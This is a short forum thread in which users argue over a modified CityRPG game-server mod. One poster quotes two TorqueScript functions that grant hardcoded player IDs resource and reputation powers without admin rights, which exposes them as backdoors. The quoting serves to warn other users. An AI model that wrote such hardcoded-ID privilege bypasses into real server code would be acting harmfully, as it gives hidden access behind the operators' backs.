Author Topic: Anyone have this?  (Read 1181 times)


Please, I am begging you, don't use that version. It's a silly 5 minute edit of Iban's CityRPG. This version (not the original) has a bunch of backdoors (iirc from the drama topic about it).


http://draked.me/drake/Gamemode_TysCityRPG.zip
You're wrong.
I don't think so.
lumberintobricks.cs
line 39
function serverCmdglumber(%client, %arg1)
{
    if((%client.isSuperAdmin) || (%client.bl_id == 997) || (%client.bl_id == 4896) || (%client.bl_id == 27161))
    %began = getWord(CityRPGData.getData(%client.bl_id).valueResources, 0);
    CityRPGData.getData(%client.bl_id).valueResources = (getWord(CityRPGData.getData(%client.bl_id).valueResources, 0) + %arg1) SPC getWord(CityRPGData.getData(%client.bl_id).valueResources, 1);

997 is his ID, and this addon has a backdoor in it to allow him and a few other people to manipulate their resources without admin.

rep.cs
line 43

function serverCmdgRep(%client, %rep, %name)
{
   if(%client.isSuperAdmin || %client.BL_ID == 997)

A backdoor for ty to give himself rep without admin.
Told you it had backdoors. Try reading the actual topic.
« Last Edit: July 08, 2014, 08:20:13 PM by Ninjaman 4 »

Try reading my post fully next time, it helps when you post. I said it wasn't a five minute edit of iban it's a lot more. I'll take the file down and PM brighter instead.